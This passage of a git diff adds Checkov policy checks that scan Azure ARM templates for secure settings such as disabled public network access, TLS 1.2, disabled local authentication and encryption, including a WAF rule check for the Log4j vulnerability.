+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def scan_resource_conf(self, conf: Dict[str, Any]) -> CheckResult:
+        properties: Optional[Dict[str, Any]] = conf.get('properties')
+        if properties is not None:
+            if 'enableMultipleWriteLocations' not in properties or properties['enableMultipleWriteLocations']:
+                self.evaluated_keys = ['enableMultipleWriteLocations']
+                if 'isVirtualNetworkFilterEnabled' in properties and properties['isVirtualNetworkFilterEnabled']:
+                    self.evaluated_keys.append('isVirtualNetworkFilterEnabled')
+                    if 'virtualNetworkRules' in properties and properties['virtualNetworkRules']:
+                        self.evaluated_keys.append('virtualNetworkRules')
+                        return CheckResult.PASSED
+                    if 'ipRules' in properties and properties['ipRules']:
+                        self.evaluated_keys.append('ipAddressOrRange')
+                        return CheckResult.PASSED
+                return CheckResult.FAILED
+        return CheckResult.PASSED
+
+
+check = CosmosDBAccountsRestrictedAccess()
diff --git a/checkov/arm/checks/resource/CosmosDBLocalAuthDisabled.py b/checkov/arm/checks/resource/CosmosDBLocalAuthDisabled.py
new file mode 100644
index 00000000000..3ce55f1d438
--- /dev/null
+++ b/checkov/arm/checks/resource/CosmosDBLocalAuthDisabled.py
@@ -0,0 +1,27 @@
+from __future__ import annotations
+from typing import Any
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class CosmosDBLocalAuthDisabled(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        description = "Ensure that Local Authentication is disabled on CosmosDB"
+        id = "CKV_AZURE_140"
+        supported_resources = ('Microsoft.DocumentDB/databaseAccounts',)
+        categories = (CheckCategories.IAM,)
+        super().__init__(name=description, id=id, categories=categories, supported_resources=supported_resources,)
+
+    def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult:
+        if conf.get("kind") == "GlobalDocumentDB":
+            return super().scan_resource_conf(conf)
+        return CheckResult.UNKNOWN
+
+    def get_inspected_key(self) -> str:
+        return "properties/disableLocalAuth"
+
+    def get_expected_value(self) -> bool:
+        return True
+
+
+check = CosmosDBLocalAuthDisabled()
diff --git a/checkov/arm/checks/resource/DataExplorerUsesDiskEncryption.py b/checkov/arm/checks/resource/DataExplorerUsesDiskEncryption.py
new file mode 100644
index 00000000000..785063e4b29
--- /dev/null
+++ b/checkov/arm/checks/resource/DataExplorerUsesDiskEncryption.py
@@ -0,0 +1,20 @@
+from checkov.common.models.enums import CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class DataExplorerUsesDiskEncryption(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure that Azure Data Explorer (Kusto) uses disk encryption"
+        id = "CKV_AZURE_74"
+        supported_resources = ("Microsoft.Kusto/clusters",)
+        categories = [CheckCategories.ENCRYPTION,]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,)
+
+    def get_inspected_key(self) -> str:
+        return "properties/enableDiskEncryption"
+
+    def get_expected_value(self) -> bool:
+        return True
+
+
+check = DataExplorerUsesDiskEncryption()
diff --git a/checkov/arm/checks/resource/DataFactoryNoPublicNetworkAccess.py b/checkov/arm/checks/resource/DataFactoryNoPublicNetworkAccess.py
new file mode 100644
index 00000000000..5843d9ff0d3
--- /dev/null
+++ b/checkov/arm/checks/resource/DataFactoryNoPublicNetworkAccess.py
@@ -0,0 +1,22 @@
+from typing import Any
+
+from checkov.common.models.enums import CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class DataFactoryNoPublicNetworkAccess(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure that Azure Data factory public network access is disabled"
+        id = "CKV_AZURE_104"
+        supported_resources = ("Microsoft.DataFactory/factories",)
+        categories = (CheckCategories.NETWORKING,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return "properties/publicNetworkAccess"
+
+    def get_expected_value(self) -> Any:
+        return "Disabled"
+
+
+check = DataFactoryNoPublicNetworkAccess()
diff --git a/checkov/arm/checks/resource/DataLakeStoreEncryption.py b/checkov/arm/checks/resource/DataLakeStoreEncryption.py
new file mode 100644
index 00000000000..76c5f50eb6c
--- /dev/null
+++ b/checkov/arm/checks/resource/DataLakeStoreEncryption.py
@@ -0,0 +1,20 @@
+from checkov.common.models.enums import CheckResult, CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class DataLakeStoreEncryption(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure that Data Lake Store accounts enables encryption"
+        id = "CKV_AZURE_105"
+        supported_resources = ['Microsoft.DataLakeStore/accounts',]
+        categories = [CheckCategories.ENCRYPTION,]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources, missing_block_result=CheckResult.PASSED)
+
+    def get_inspected_key(self) -> str:
+        return 'properties/encryptionState'
+
+    def get_expected_value(self) -> str:
+        return "Enabled"
+
+
+check = DataLakeStoreEncryption()
diff --git a/checkov/arm/checks/resource/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py b/checkov/arm/checks/resource/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py
new file mode 100644
index 00000000000..ee16ea9731f
--- /dev/null
+++ b/checkov/arm/checks/resource/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py
@@ -0,0 +1,32 @@
+from __future__ import annotations
+
+from typing import Any
+
+from checkov.common.models.enums import CheckResult, CheckCategories
+from checkov.arm.base_resource_check import BaseResourceCheck
+from checkov.common.util.data_structures_utils import find_in_dict
+
+
+class DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey(BaseResourceCheck):
+    def __init__(self) -> None:
+        # https://learn.microsoft.com/en-us/azure/templates/microsoft.databricks/workspaces?pivots=deployment-language-arm-template#workspaceencryptionparameter-1
+        name = "Ensure that Databricks Workspaces enables customer-managed key for root DBFS encryption"
+        id = "CKV2_AZURE_48"
+        supported_resources = ("Microsoft.Databricks/workspaces",)
+        categories = (CheckCategories.ENCRYPTION,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult:
+        parameters = conf.get("properties", {}).get("parameters")
+        prepare_encryption = find_in_dict(input_dict=parameters, key_path="prepareEncryption/value")
+        if not prepare_encryption or str(prepare_encryption).lower() != "true":
+            return CheckResult.FAILED
+
+        encryption_settings = find_in_dict(input_dict=parameters, key_path="encryption/value")
+        if not encryption_settings:
+            return CheckResult.FAILED
+
+        return CheckResult.PASSED
+
+
+check = DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey()
diff --git a/checkov/arm/checks/resource/DatabricksWorkspaceIsNotPublic.py b/checkov/arm/checks/resource/DatabricksWorkspaceIsNotPublic.py
new file mode 100644
index 00000000000..aaae17689c8
--- /dev/null
+++ b/checkov/arm/checks/resource/DatabricksWorkspaceIsNotPublic.py
@@ -0,0 +1,27 @@
+from __future__ import annotations
+
+from typing import Any
+
+from checkov.common.models.enums import CheckResult, CheckCategories
+from checkov.arm.base_resource_check import BaseResourceCheck
+from checkov.common.util.data_structures_utils import find_in_dict
+
+
+class DatabricksWorkspaceIsNotPublic(BaseResourceCheck):
+    def __init__(self) -> None:
+        # https://learn.microsoft.com/en-us/azure/templates/microsoft.databricks/workspaces?pivots=deployment-language-arm-template
+        name = "Ensure Databricks Workspace data plane to control plane communication happens over private link"
+        id = "CKV_AZURE_158"
+        supported_resources = ("Microsoft.Databricks/workspaces",)
+        categories = (CheckCategories.NETWORKING,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult:
+        public_network_access = find_in_dict(input_dict=conf, key_path="properties/publicNetworkAccess")
+        if not public_network_access or public_network_access == "Enabled":
+            return CheckResult.FAILED
+
+        return CheckResult.PASSED
+
+
+check = DatabricksWorkspaceIsNotPublic()
diff --git a/checkov/arm/checks/resource/EventHubNamespaceMinTLS12.py b/checkov/arm/checks/resource/EventHubNamespaceMinTLS12.py
new file mode 100644
index 00000000000..20e8e13b917
--- /dev/null
+++ b/checkov/arm/checks/resource/EventHubNamespaceMinTLS12.py
@@ -0,0 +1,25 @@
+from __future__ import annotations
+
+from typing import Any
+
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class EventHubNamespaceMinTLS12(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure Event Hub Namespace uses at least TLS 1.2"
+        id = "CKV_AZURE_223"
+        supported_resources = ["Microsoft.EventHub/namespaces", ]
+        categories = [CheckCategories.ENCRYPTION, ]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,
+                         missing_block_result=CheckResult.PASSED)
+
+    def get_inspected_key(self) -> str:
+        return "properties/minimumTlsVersion"
+
+    def get_expected_value(self) -> Any:
+        return "1.2"
+
+
+check = EventHubNamespaceMinTLS12()
diff --git a/checkov/arm/checks/resource/EventgridTopicIdentityProviderEnabled.py b/checkov/arm/checks/resource/EventgridTopicIdentityProviderEnabled.py
new file mode 100644
index 00000000000..9156f68b281
--- /dev/null
+++ b/checkov/arm/checks/resource/EventgridTopicIdentityProviderEnabled.py
@@ -0,0 +1,23 @@
+from typing import Any
+
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+from checkov.common.models.consts import ANY_VALUE
+from checkov.common.models.enums import CheckCategories
+
+
+class EventgridTopicIdentityProviderEnabled(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure that Managed identity provider is enabled for Azure Event Grid Topic"
+        id = "CKV_AZURE_191"
+        supported_resources = ("Microsoft.EventGrid/topics",)
+        categories = (CheckCategories.IAM,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return "identity/type"
+
+    def get_expected_value(self) -> Any:
+        return ANY_VALUE
+
+
+check = EventgridTopicIdentityProviderEnabled()
diff --git a/checkov/arm/checks/resource/EventgridTopicLocalAuthentication.py b/checkov/arm/checks/resource/EventgridTopicLocalAuthentication.py
new file mode 100644
index 00000000000..e403a00fe96
--- /dev/null
+++ b/checkov/arm/checks/resource/EventgridTopicLocalAuthentication.py
@@ -0,0 +1,20 @@
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+from checkov.common.models.enums import CheckCategories
+
+
+class EventgridTopicLocalAuthentication(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure that Azure Event Grid Topic local Authentication is disabled"
+        id = "CKV_AZURE_192"
+        supported_resources = ("Microsoft.EventGrid/topics",)
+        categories = (CheckCategories.IAM,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return "properties/disableLocalAuth"
+
+    def get_expected_value(self) -> bool:
+        return True
+
+
+check = EventgridTopicLocalAuthentication()
diff --git a/checkov/arm/checks/resource/EventgridTopicNetworkAccess.py b/checkov/arm/checks/resource/EventgridTopicNetworkAccess.py
new file mode 100644
index 00000000000..57b792d7c22
--- /dev/null
+++ b/checkov/arm/checks/resource/EventgridTopicNetworkAccess.py
@@ -0,0 +1,20 @@
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+from checkov.common.models.enums import CheckCategories
+
+
+class EventgridTopicNetworkAccess(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure public network access is disabled for Azure Event Grid Topic"
+        id = "CKV_AZURE_193"
+        supported_resources = ("Microsoft.EventGrid/topics",)
+        categories = (CheckCategories.NETWORKING,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return "properties/publicNetworkAccess"
+
+    def get_expected_value(self) -> str:
+        return "Disabled"
+
+
+check = EventgridTopicNetworkAccess()
diff --git a/checkov/arm/checks/resource/FrontDoorWAFACLCVE202144228.py b/checkov/arm/checks/resource/FrontDoorWAFACLCVE202144228.py
new file mode 100644
index 00000000000..404782107d3
--- /dev/null
+++ b/checkov/arm/checks/resource/FrontDoorWAFACLCVE202144228.py
@@ -0,0 +1,54 @@
+from typing import Dict, Any
+
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.common.util.type_forcers import force_list
+from checkov.arm.base_resource_check import BaseResourceCheck
+
+
+class FrontDoorWAFACLCVE202144228(BaseResourceCheck):
+    def __init__(self) -> None:
+        name = "Ensure Front Door WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell"
+        id = "CKV_AZURE_133"
+        supported_resources = ["Microsoft.Network/frontdoorWebApplicationFirewallPolicies"]
+        categories = [CheckCategories.APPLICATION_SECURITY]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def scan_resource_conf(self, conf: Dict[Any, Any]) -> CheckResult:
+        self.evaluatedKeys = ["managedRules"]
+        properties = conf.get("properties")
+        if properties is None or "managedRules" not in properties:
+            return CheckResult.FAILED
+
+        managedRules = properties.get("managedRules")
+        if not managedRules:
+            return CheckResult.FAILED
+
+        for idx_managed_rule, managed_rule in enumerate(force_list(managedRules.get("managedRuleSets", []))):
+            self.evaluated_keys = [f"managedRules/[{idx_managed_rule}]/type"]
+            if managed_rule and managed_rule.get("ruleSetType") in ["DefaultRuleSet", "Microsoft_DefaultRuleSet"]:
+                ruleOverrides = managed_rule.get("ruleGroupOverrides", [])
+                if ruleOverrides == []:
+                    return CheckResult.PASSED
+                for idx_override, rule_override in enumerate(force_list(ruleOverrides)):
+                    self.evaluated_keys.append(
+                        f"managedRules/[{idx_managed_rule}]/ruleGroupOverrides/[{idx_override}]/ruleGroupName"
+                    )
+                    if rule_override.get("ruleGroupName") == "JAVA":
+                        rules = rule_override.get("rules", [])
+                        for idx_rule, rule in enumerate(force_list(rules)):
+                            self.evaluated_keys.extend([
+                                f"managedRules/[{idx_managed_rule}]/ruleGroupOverrides/[{idx_override}]/rules/[{idx_rule}]/ruleId",
+                                f"managedRules/[{idx_managed_rule}]/ruleGroupOverrides/[{idx_override}]/rules/[{idx_rule}]/enabledState",
+                                f"managedRules/[{idx_managed_rule}]/ruleGroupOverrides/[{idx_override}]/rules/[{idx_rule}]/action",
+                            ])
+                            if rule.get("ruleId") == "944240":
+                                enabledState = rule.get("enabledState")
+                                if not enabledState:
+                                    return CheckResult.FAILED
+                                if rule.get("action") in ["Block", "Redirect"]:
+                                    return CheckResult.PASSED
+
+        return CheckResult.FAILED
+
+
+check = FrontDoorWAFACLCVE202144228()
diff --git a/checkov/arm/checks/resource/FunctionAppDisallowCORS.py b/checkov/arm/checks/resource/FunctionAppDisallowCORS.py
new file mode 100644
index 00000000000..e8b98b464d5
--- /dev/null
+++ b/checkov/arm/checks/resource/FunctionAppDisallowCORS.py
@@ -0,0 +1,24 @@
+from typing import List, Any
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.arm.base_resource_negative_value_check import BaseResourceNegativeValueCheck
+
+
+class FunctionAppDisallowCORS(BaseResourceNegativeValueCheck):
+
+    def __init__(self) -> None:
+        name = "Ensure function apps are not accessible from all regions"
+        id = "CKV_AZURE_62"
+        supported_resources = ("Microsoft.Web/sites",)
+        categories = (CheckCategories.GENERAL_SECURITY,)
+        super().__init__(name=name, id=id, categories=categories,
+                         supported_resources=supported_resources,
+                         missing_block_result=CheckResult.PASSED)
+
+    def get_inspected_key(self) -> str:
+        return "properties/siteConfig/cors/allowedOrigins"
+
+    def get_forbidden_values(self) -> List[Any]:
+        return ["*"]
+
+
+check = FunctionAppDisallowCORS()
diff --git a/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py b/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py
new file mode 100644
index 00000000000..a514d7983f7
--- /dev/null
+++ b/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py
@@ -0,0 +1,22 @@
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+from checkov.common.models.enums import CheckCategories
+
+
+class FunctionAppHttpVersionLatest(BaseResourceValueCheck):
+
+    def __init__(self) -> None:
+        name = "Ensure that 'HTTP Version' is the latest, if used to run the Function app"
+        id = "CKV_AZURE_67"
+        supported_resources = ("Microsoft.Web/sites/slots", "Microsoft.Web/sites",)
+        categories = (CheckCategories.GENERAL_SECURITY,)
+        super().__init__(
+            name=name,
+            id=id,
+            categories=categories,
+            supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return "properties/siteConfig/http20Enabled"
+
+
+check = FunctionAppHttpVersionLatest()
diff --git a/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py b/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py
new file mode 100644
index 00000000000..cefe0dd5825
--- /dev/null
+++ b/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py
@@ -0,0 +1,26 @@
+from typing import Any, List
+
+from checkov.common.models.enums import CheckResult, CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class FunctionAppMinTLSVersion(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure Function app is using the latest version of TLS encryption"
+        id = "CKV_AZURE_145"
+        supported_resources = ('Microsoft.Web/sites', 'Microsoft.Web/sites/slots',)
+        categories = [CheckCategories.NETWORKING]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,
+                         missing_block_result=CheckResult.PASSED)
+
+    def get_inspected_key(self) -> str:
+        return "properties/siteConfig/minTlsVersion"
+
+    def get_expected_value(self) -> Any:
+        return 1.2
+
+    def get_expected_values(self) -> List[Any]:
+        return ["1.2", 1.2]
+
+
+check = FunctionAppMinTLSVersion()
diff --git a/checkov/arm/checks/resource/FunctionAppsAccessibleOverHttps.py b/checkov/arm/checks/resource/FunctionAppsAccessibleOverHttps.py
new file mode 100644
index 00000000000..87e4a2cd84b
--- /dev/null
+++ b/checkov/arm/checks/resource/FunctionAppsAccessibleOverHttps.py
@@ -0,0 +1,45 @@
+from __future__ import annotations
+
+from typing import Any
+
+from checkov.common.models.enums import CheckResult, CheckCategories
+from checkov.arm.base_resource_check import BaseResourceCheck
+
+
+class FunctionAppsAccessibleOverHttps(BaseResourceCheck):
+    def __init__(self) -> None:
+        name = "Ensure that Function apps is only accessible over HTTPS"
+        id = "CKV_AZURE_70"
+        supported_resources = (
+            "Microsoft.Web/sites/config",
+            "Microsoft.Web/sites",
+            "Microsoft.Web/sites/slots",
+        )
+        categories = (CheckCategories.NETWORKING,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,)
+
+    def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult:
+        if "properties" in conf:
+            if self.entity_type == "Microsoft.Web/sites" or self.entity_type == "Microsoft.Web/sites/slots":
+                if "httpsOnly" not in conf["properties"]:
+                    return CheckResult.FAILED
+
+                https_only = conf["properties"]["httpsOnly"]
+                if not https_only:
+                    return CheckResult.FAILED
+
+        if "httpSettings" in conf["properties"]:
+            auth_settings_v2 = conf["properties"]["httpSettings"]
+
+            # default=true for require_https
+            if 'requireHttps' not in auth_settings_v2:
+                return CheckResult.PASSED
+
+            require_https = auth_settings_v2.get("requireHttps")
+            if not require_https:
+                return CheckResult.FAILED
+
+        return CheckResult.PASSED
+
+
+check = FunctionAppsAccessibleOverHttps()
diff --git a/checkov/arm/checks/resource/FunctionAppsEnableAuthentication.py b/checkov/arm/checks/resource/FunctionAppsEnableAuthentication.py
new file mode 100644
index 00000000000..3c6656b3e84
--- /dev/null
+++ b/checkov/arm/checks/resource/FunctionAppsEnableAuthentication.py
@@ -0,0 +1,32 @@
+from __future__ import annotations
+
+from typing import Any
+
+from checkov.arm.base_resource_check import BaseResourceCheck
+from checkov.common.models.enums import CheckCategories, CheckResult
+
+
+class FunctionAppsEnableAuthentication(BaseResourceCheck):
+
+    def __init__(self) -> None:
+        name = "Ensure that function apps enables Authentication"
+        id = "CKV_AZURE_56"
+        supported_resources = ("Microsoft.Web/sites/config",)
+        categories = (CheckCategories.GENERAL_SECURITY,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,)
+
+    def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult:
+        if conf.get('name', '') != 'authsettingsV2':
+            return CheckResult.PASSED
+
+        properties = conf.get('properties', {})
+        if properties and isinstance(properties, dict):
+            platform = properties.get('platform', {})
+            if platform and isinstance(properties, dict):
+                enabled = platform.get('enabled', False)
+                if enabled:
+                    return CheckResult.PASSED
+        return CheckResult.FAILED
+
+
+check = FunctionAppsEnableAuthentication()
diff --git a/checkov/arm/checks/resource/KeyVaultDisablesPublicNetworkAccess.py b/checkov/arm/checks/resource/KeyVaultDisablesPublicNetworkAccess.py
new file mode 100644
index 00000000000..75a46dd98f2
--- /dev/null
+++ b/checkov/arm/checks/resource/KeyVaultDisablesPublicNetworkAccess.py
@@ -0,0 +1,38 @@
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+from typing import Dict, Any
+
+
+class KeyVaultDisablesPublicNetworkAccess(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure that Azure Key Vault disables public network access"
+        id = "CKV_AZURE_189"
+        supported_resources = ("Microsoft.KeyVault/vaults",)
+        categories = (CheckCategories.NETWORKING,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return "publicNetworkAccess"
+
+    def get_expected_value(self) -> str:
+        return "disabled"
+
+    def scan_resource_conf(self, conf: Dict[str, Any]) -> CheckResult:
+        properties = conf.get("properties", {})
+        if self.get_inspected_key() in properties:
+            conf_value = conf["properties"][self.get_inspected_key()]
+            # Docs are unclear, so supporting Disabled and disabled
+            if conf_value and conf_value.lower() == self.get_expected_value():
+                return CheckResult.PASSED
+
+        if properties and "networkAcls" in properties:
+            network_acls = conf["properties"]["networkAcls"]
+            if isinstance(network_acls, dict) and "ipRules" in network_acls:
+                ip_rules = network_acls["ipRules"]
+                ip_rules = ip_rules[0] if ip_rules and isinstance(ip_rules, list) else ip_rules
+                if ip_rules:
+                    return CheckResult.PASSED
+        return CheckResult.FAILED
+
+
+check = KeyVaultDisablesPublicNetworkAccess()
diff --git a/checkov/arm/checks/resource/KeyVaultEnablesPurgeProtection.py b/checkov/arm/checks/resource/KeyVaultEnablesPurgeProtection.py
new file mode 100644
index 00000000000..9cbaf05c790
--- /dev/null
+++ b/checkov/arm/checks/resource/KeyVaultEnablesPurgeProtection.py
@@ -0,0 +1,22 @@
+from typing import Any
+
+from checkov.common.models.enums import CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class KeyVaultEnablesPurgeProtection(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure that key vault enables purge protection"
+        id = "CKV_AZURE_110"
+        supported_resources = ['Microsoft.KeyVault/vaults']
+        categories = [CheckCategories.NETWORKING]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> Any:
+        return "properties/enablePurgeProtection"
+
+    def get_expected_value(self) -> bool:
+        return True
+
+
+check = KeyVaultEnablesPurgeProtection()
diff --git a/checkov/arm/checks/resource/LinuxVMUsesSSH.py b/checkov/arm/checks/resource/LinuxVMUsesSSH.py
new file mode 100644
index 00000000000..9cc03be99c2
--- /dev/null
+++ b/checkov/arm/checks/resource/LinuxVMUsesSSH.py
@@ -0,0 +1,24 @@
+from checkov.common.models.enums import CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+from typing import Any
+from checkov.common.models.consts import ANY_VALUE
+
+
+class LinuxVMUsesSSH(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure linux VM enables SSH with keys for secure communication"
+        id = "CKV_AZURE_178"
+        supported_resources = ("Microsoft.Compute/virtualMachines", "Microsoft.Compute/virtualMachineScaleSets")
+        categories = (CheckCategories.GENERAL_SECURITY,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,)
+
+    def get_inspected_key(self) -> str:
+        if self.entity_type == "Microsoft.Compute/virtualMachineScaleSets":
+            return "properties/virtualMachineProfile/osProfile/linuxConfiguration/ssh/publicKeys/[0]/path"
+        return "properties/osProfile/linuxConfiguration/ssh/publicKeys/[0]/path"
+
+    def get_expected_value(self) -> Any:
+        return ANY_VALUE
+
+
+check = LinuxVMUsesSSH()
diff --git a/checkov/arm/checks/resource/MSSQLServerMinTLSVersion.py b/checkov/arm/checks/resource/MSSQLServerMinTLSVersion.py
new file mode 100644
index 00000000000..55669a57f29
--- /dev/null
+++ b/checkov/arm/checks/resource/MSSQLServerMinTLSVersion.py
@@ -0,0 +1,24 @@
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class MSSQLServerMinTLSVersion(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure MSSQL is using the latest version of TLS encryption"
+        id = "CKV_AZURE_52"
+        supported_resources = ("Microsoft.Sql/servers",)
+        categories = (CheckCategories.NETWORKING,)
+        super().__init__(name=name,
+                         id=id,
+                         categories=categories,
+                         supported_resources=supported_resources,
+                         missing_block_result=CheckResult.FAILED,)
+
+    def get_inspected_key(self) -> str:
+        return "properties/minimalTlsVersion"
+
+    def get_expected_value(self) -> str:
+        return "1.2"
+
+
+check = MSSQLServerMinTLSVersion()
diff --git a/checkov/arm/checks/resource/MariaDBGeoBackupEnabled.py b/checkov/arm/checks/resource/MariaDBGeoBackupEnabled.py
new file mode 100644
index 00000000000..87f98131687
--- /dev/null
+++ b/checkov/arm/checks/resource/MariaDBGeoBackupEnabled.py
@@ -0,0 +1,20 @@
+from checkov.common.models.enums import CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class MariaDBGeoBackupEnabled(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure that MariaDB server enables geo-redundant backups"
+        id = "CKV_AZURE_129"
+        supported_resources = ("Microsoft.DBforMariaDB/servers",)
+        categories = (CheckCategories.BACKUP_AND_RECOVERY,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return "properties/storageProfile/geoRedundantBackup"
+
+    def get_expected_value(self) -> str:
+        return "Enabled"
+
+
+check = MariaDBGeoBackupEnabled()
diff --git a/checkov/arm/checks/resource/MariaDBPublicAccessDisabled.py b/checkov/arm/checks/resource/MariaDBPublicAccessDisabled.py
new file mode 100644
index 00000000000..5d095ac5adf
--- /dev/null
+++ b/checkov/arm/checks/resource/MariaDBPublicAccessDisabled.py
@@ -0,0 +1,20 @@
+from checkov.common.models.enums import CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class MariaDBPublicAccessDisabled(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure 'public network access enabled' is set to 'False' for MariaDB servers"
+        id = "CKV_AZURE_48"
+        supported_resources = ("Microsoft.DBforMariaDB/servers",)
+        categories = (CheckCategories.NETWORKING,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return "properties/publicNetworkAccess"
+
+    def get_expected_value(self) -> str:
+        return "Disabled"
+
+
+check = MariaDBPublicAccessDisabled()
diff --git a/checkov/arm/checks/resource/MySQLPublicAccessDisabled.py b/checkov/arm/checks/resource/MySQLPublicAccessDisabled.py
new file mode 100644
index 00000000000..6336a41668a
--- /dev/null
+++ b/checkov/arm/checks/resource/MySQLPublicAccessDisabled.py
@@ -0,0 +1,23 @@
+from checkov.common.models.enums import CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class MySQLPublicAccessDisabled(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure 'public network access enabled' is set to 'False' for mySQL servers"
+        id = "CKV_AZURE_53"
+        supported_resources = ("Microsoft.DBforMySQL/servers",)
+        categories = (CheckCategories.NETWORKING,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return "properties/publicNetworkAccess"
+
+    def get_expected_value(self) -> str:
+        """
+        Returns the default expected value, governed by provider best practices
+        """
+        return "disabled"
+
+
+check = MySQLPublicAccessDisabled()
diff --git a/checkov/arm/checks/resource/MySQLServerMinTLSVersion.py b/checkov/arm/checks/resource/MySQLServerMinTLSVersion.py
new file mode 100644
index 00000000000..ddba3b1261d
--- /dev/null
+++ b/checkov/arm/checks/resource/MySQLServerMinTLSVersion.py
@@ -0,0 +1,23 @@
+from checkov.common.models.enums import CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class MySQLServerMinTLSVersion(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure MySQL is using the latest version of TLS encryption"
+        id = "CKV_AZURE_54"
+        supported_resources = ("Microsoft.DBforMySQL/servers",)
+        categories = (CheckCategories.NETWORKING,)
+        super().__init__(name=name,
+                         id=id,
+                         categories=categories,
+                         supported_resources=supported_resources, )
+
+    def get_inspected_key(self) -> str:
+        return "properties/minimalTlsVersion"
+
+    def get_expected_value(self) -> str:
+        return "TLS1_2"
+
+
+check = MySQLServerMinTLSVersion()
diff --git a/checkov/arm/checks/resource/PostgreSQLServerPublicAccessDisabled.py b/checkov/arm/checks/resource/PostgreSQLServerPublicAccessDisabled.py
new file mode 100644
index 00000000000..12465811122
--- /dev/null
+++ b/checkov/arm/checks/resource/PostgreSQLServerPublicAccessDisabled.py
@@ -0,0 +1,21 @@
+from checkov.common.models.enums import CheckCategories, CheckResult
